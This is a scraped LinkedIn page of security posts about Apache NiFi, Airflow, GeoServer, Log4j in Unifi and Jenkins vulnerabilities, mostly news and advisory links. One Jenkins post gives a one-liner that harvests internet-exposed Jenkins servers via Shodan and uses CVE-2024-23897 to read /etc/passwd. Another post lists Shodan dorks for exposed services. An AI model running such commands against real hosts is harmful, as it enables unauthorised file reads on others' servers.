The Apache NiFi Team has published CVE-2024-37389 related to improper neutralization of input in Parameter Context descriptions. Upgrading to Apache NiFi 2.0.0-M4 or 1.27.0 is the recommended mitigation. Thanks to Akbar Kustirama for finding and reporting the problem! https://lnkd.in/g4qatzVd
Apache NiFi’s Post
More Relevant Posts
-
#Vulnerability #ApacheNiFi PoC Exploit Released for Apache NiFi Code Execution Vulnerability (CVE-2023-34212)
PoC Exploit Released for Apache NiFi Code Execution Vulnerability (CVE-2023-34212)
https://securityonline.info
To view or add a comment, sign in
-
Dependency Confusion Vulnerability Found in Apache Project: This occurs when a private package fetches a similar public one, leading to exploit due to misconfigurations in package managers
Dependency Confusion Vulnerability Found in Apache Project
infosecurity-magazine.com
To view or add a comment, sign in
-
Geoserver CVE-2023-41877 was published yesterday, a path traversal vulnerability. I found this some time ago and explored the possibilties apart from disclosing information stored in server files. The advisory says that it could lead to RCE and it is not just by getting credentials from files or whatever, abusing just this vulnerability and Geoserver is enough under certain circumstances. I decided to publish a little article about how to leverage RCE by just abusing this vulnerability. The idea is to encourage Geoservers administrators to apply the proper mitigation steps.
Exploiting GeoServer path traversal vulnerability (CVE-2023-41877)
blog.anthares101.com
To view or add a comment, sign in
-
🌐 Bridging Data Orchestration and Cybersecurity: A Must-Read from Jarek Potiuk! 🌐 This is to all my data network from back when I worked at Astronomer 😉 I'm thrilled to share an insightful article written by my former colleague that resonates deeply with my professional journey. Transitioning from data orchestration to cybersecurity, it's exciting to see these worlds intersect in meaningful ways. This piece delves into a recent security vulnerability within Apache Airflow, exploring the challenges and remediations in open-source development. From discovering a subtle typo in GitHub Actions to implementing strategic security enhancements, the article is a journey into the complexities of cybersecurity. 👉 Highly recommended for insights into the evolving landscape of tech security: https://lnkd.in/dVM2Jn3a #CyberSecurity #DataOrchestration #ApacheAirflow #TechInsight
Independent Open-Source Contributor and Advisor,Committer and PMC member of Apache Airflow, Member of the Apache Software Foundation, member of ASF Security Committe
If you are into Open-Source Security, this blog post describes a story of security vulnerability reported to Apache Airflow - that could potentially get very bad. It shows the strength of The Apache Software Foundation security process as defined now, but also how individuals empowered by funding from Sovereign Tech Fund can add extra layers of protection and strenghten the release process even more. A bit cautionary tale for maintainers to pay attention to securing their release process, but also hopefull view on emerging funding models that will put security process front and center - especially in the light of upcoming regulations in EU and US. Thanks to Harish P for reporting the original issue.
Unraveling the Code: Navigating a CI/Release Security Vulnerability in Apache Airflow
medium.com
To view or add a comment, sign in
-
Independent Open-Source Contributor and Advisor,Committer and PMC member of Apache Airflow, Member of the Apache Software Foundation, member of ASF Security Committe
If you are into Open-Source Security, this blog post describes a story of security vulnerability reported to Apache Airflow - that could potentially get very bad. It shows the strength of The Apache Software Foundation security process as defined now, but also how individuals empowered by funding from Sovereign Tech Fund can add extra layers of protection and strenghten the release process even more. A bit cautionary tale for maintainers to pay attention to securing their release process, but also hopefull view on emerging funding models that will put security process front and center - especially in the light of upcoming regulations in EU and US. Thanks to Harish P for reporting the original issue.
Unraveling the Code: Navigating a CI/Release Security Vulnerability in Apache Airflow
medium.com
To view or add a comment, sign in
-
Exploiting Log4j Vulnerabilities in Unifi Software. Learn how to: - Gain reverse shell access - Add an administrative user to the Unifi MongoDB instance To automate this process we have released a GitHub repository to exploit the vulnerability: 🔗 https://lnkd.in/gQ-zpXeF Read the full article here: 👇 https://lnkd.in/g9YzVEBx
GitHub - puzzlepeaches/Log4jUnifi: Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more.
github.com
To view or add a comment, sign in
-
Multiple PoC exploits released for Jenkins flaw CVE-2024-23897: Multiple proof-of-concept (PoC) exploits for recently disclosed critical Jenkins vulnerability CVE-2024-23897 have been released. Researchers warn that several proof-of-concept (PoC) exploits targeting the recently disclosed critical Jenkins vulnerability, CVE-2024-23897, have been made public. Jenkins is the most popular open source automation server, it is maintained by CloudBees and the Jenkins community. The automation server supports developers […]
Multiple PoC exploits released for Jenkins flaw CVE-2024-23897
https://securityaffairs.com
To view or add a comment, sign in
-
Is the args4j vulnerability in Jenkins (CVE-2024-23897) the beginning of another log4j? https://lnkd.in/ge2Q9pKB
Arbitrary File Read in Jenkins via args4j (CVE-2024-23897)
travisgreen.net
To view or add a comment, sign in
-
Jenkins has Recently released a security advisory on unauthenticated file read vulnerability ( CVE-2024-23897). The vulnerability was a result of a third-party library called args4j which was used to parse the commands from Jenkins-cli utility. Here is a quick oneliner to identify the vulnerability among public Jenkins instances that are exposed on the internet. uncover -shodan "X-Jenkins"|httpx| xargs -I % sh -c 'echo %;java -jar jenkins-cli.jar -s %/ -http help 1 "@/etc/passwd";echo "-----------------------";exit 0;' Make sure you have the following tools installed -> https://lnkd.in/gUTtuaRP -> https://lnkd.in/gT75H4pE -> jenkins-cli utility Vulnerable instances would result in exposing the first line of the /etc/passwd file as an Error Message. Mitigation Steps -> Upgrading Jenkins to 2.442, LTS 2.426.3 -> As an Immediate step we can disable the Jenkins CLI, more details here https://lnkd.in/gpbuARMA #vulnerability #cve #jenkins #security
To view or add a comment, sign in
-
Intern at FCRF | Web App Pentesting | CTF Player | Security Researcher 🐞 | B.Tech Student at GLA University
Some Shodan Dorks that might useful in Bug Bounty 💻. 1. org:"http://target.com" 2. http.status:"<status_code>" 3. product:"<Product_Name>" 4. port:<Port_Number> “Service_Message” 5. port:<Port_Number> “Service_Name” 6. http.component:"<Component_Name>" 7. http.component_category:"<Component_Category> 8. http.waf:"<firewall_name>" 9. http.html:"<Name>" 10. http.title:"<Title_Name>" 11. ssl.alpn:"<Protocol>" 12. http.favicon.hash:"<Favicon_Hash>" 13. net:"<Net_Range>" (for e.g. 104.16.100.52/32) 14. http://ssl.cert.subject.cn:"<http://Domain .com>" 15. asn:"<ASnumber>" 16. hostname:"<hosthame>" 17. ip:"<IP_Address>" 18. all:"<Keyword>" 19. “Set-Cookie: phpMyAdmin” 20. “Set-Cookie: lang=" 21. “Set-Cookie: PHPSESSID" 22. “Set-Cookie: webvpn” 23. “Set-Cookie:webvpnlogin=1" 24. “Set-Cookie:webvpnLang=en” 25. “Set-Cookie: mongo-express=" 26. “Set-Cookie: user_id=" 27. “Set-Cookie: phpMyAdmin=" 28. “Set-Cookie: _gitlab_session” 29. “X-elastic-product: Elasticsearch” 30. “x-drupal-cache” 31. “access-control-allow-origin” 32. “WWW-Authenticate” 33. “X-Magento-Cache-Debug” 34. “kbn-name: kibana”
To view or add a comment, sign in
1,903 followers
I break things to make them better—or worse. Can't guarantee though.
1moThank you Apache NiFi Team for the swift action on the report. It's been a pleasure contributing to such a project 😁😁